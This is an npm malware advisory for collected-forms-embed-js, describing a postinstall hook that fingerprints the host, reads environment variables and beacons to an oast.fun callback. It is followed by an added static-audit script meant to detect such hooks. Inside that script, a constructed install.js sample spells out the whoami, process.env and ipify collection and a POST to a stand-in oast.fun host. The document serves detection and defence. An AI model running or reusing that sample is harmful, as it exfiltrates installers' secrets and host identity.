collected-forms-embed-js @8.0.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4175
Ecosystem
npm
Summary
The package.json declares a postinstall lifecycle hook that performs reconnaissance and exfiltration on every install. The script invokes child_process to capture host identity (whoami) and reads process.env, queries https://api.ipify.org to obtain the installer's public IP, and POSTs the collected data to a subdomain of oast.fun (an out-of-band application security testing / interaction host commonly used as an exfiltration callback). Any developer or CI system running npm install for this package will leak host identity, environment variables, and network identifiers to the attacker-controlled callback. There is no legitimate reason for a forms-embedding library to fingerprint hosts and beacon to an OAST domain at install time.
Source: amazon-inspector (b110466fd12f426709ec7f628f63304d175faddb8094d08e8448388ed3114805)
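The behaviour described in the summary can be caught statically before a tarball is ever installed: look for install-time lifecycle hooks, follow any `node <file>` they run, and flag the combination of host fingerprinting and an outbound callback. The following is an added example written for this report, not code from osv.dev, amazon-inspector or the package itself. The package.json and install.js it scans are constructed to resemble the reported pattern and are not the real package contents; the indicator list takes oast.fun from the report and assumes the other `.oast.*` names are sibling domains of the same interaction tooling.

```javascript
// Added example: static audit of npm install lifecycle scripts for the
// recon-plus-callback pattern described in the report. No network access.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each indicator is a regex over script text; the id is what appears in findings.
const INDICATORS = [
  { id: "child_process", re: /require\(['"]child_process['"]\)|execSync|spawnSync|\bexec\(/ },
  { id: "host-identity", re: /\bwhoami\b|os\.userInfo\(|os\.hostname\(/ },
  // Whole-environment access (process.env as an object), not a single variable lookup.
  { id: "env-dump", re: /process\.env(?![.\[])/ },
  { id: "public-ip-lookup", re: /api\.ipify\.org/ },
  // oast.fun is the domain named in the report; the siblings are assumed to be
  // other default domains of the same interaction tooling.
  { id: "oast-callback", re: /\.oast\.(fun|pro|live|site|online|me)\b/ },
  { id: "outbound-post", re: /method:\s*['"]POST['"]|fetch\(|https?\.request\(/ },
];

// Files a hook command would execute: "node install.js && node x.js" -> ["install.js", "x.js"].
function referencedScripts(command) {
  const out = [];
  const re = /\bnode\s+([^\s&|;]+)/g;
  let m;
  while ((m = re.exec(command)) !== null) out.push(m[1]);
  return out;
}

function matchIndicators(text) {
  return INDICATORS.filter(({ re }) => re.test(text)).map(({ id }) => id);
}

// pkg: parsed package.json; files: { path: contents } from the package tarball.
// Returns one finding per install-time hook, with the indicators seen in the
// command itself and in any script file it runs.
function auditInstallScripts(pkg, files) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    const texts = [command];
    const missing = []; // referenced files not in the tarball: cannot be audited
    for (const path of referencedScripts(command)) {
      if (Object.prototype.hasOwnProperty.call(files, path)) texts.push(files[path]);
      else missing.push(path);
    }
    const indicators = [...new Set(texts.flatMap(matchIndicators))];
    findings.push({ hook, command, indicators, missing });
  }
  return findings;
}

// Policy: an install hook that both fingerprints the host and has an outbound
// path is blocked; any install hook at all is queued for review.
function verdict(findings) {
  const recon = new Set(["child_process", "host-identity", "env-dump", "public-ip-lookup"]);
  const exfil = new Set(["oast-callback", "outbound-post"]);
  for (const f of findings) {
    const hasRecon = f.indicators.some((i) => recon.has(i));
    const hasExfil = f.indicators.some((i) => exfil.has(i));
    if (hasRecon && hasExfil) return "block";
  }
  return findings.length ? "review" : "clean";
}

// CONSTRUCTED sample mimicking the reported behaviour; not the real package files.
const SAMPLE_PKG = {
  name: "example-forms-embed",
  version: "0.0.0",
  scripts: { postinstall: "node install.js" },
};
const SAMPLE_FILES = {
  "install.js": [
    "const { execSync } = require('child_process');",
    "const https = require('https');",
    "const user = execSync('whoami').toString().trim();",
    "const env = process.env;",
    "https.get('https://api.ipify.org', (r) => { let ip = ''; r.on('data', (d) => ip += d); r.on('end', () => {",
    "  const body = JSON.stringify({ user, env, ip });",
    "  const req = https.request({ host: 'example-callback.oast.fun', method: 'POST', path: '/' });",
    "  req.end(body);",
    "}); });",
  ].join("\n"),
};
const BENIGN_PKG = { name: "benign", version: "1.0.0", scripts: { test: "node test.js" } };

const sampleFindings = auditInstallScripts(SAMPLE_PKG, SAMPLE_FILES);
console.log(JSON.stringify(sampleFindings, null, 2), verdict(sampleFindings));
```

Run it over the unpacked tarball of a candidate package before `npm install`. As a blanket control, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) prevents postinstall hooks from running at all; the caveat is that packages with native builds rely on install scripts, so an allow-list is usually needed alongside it.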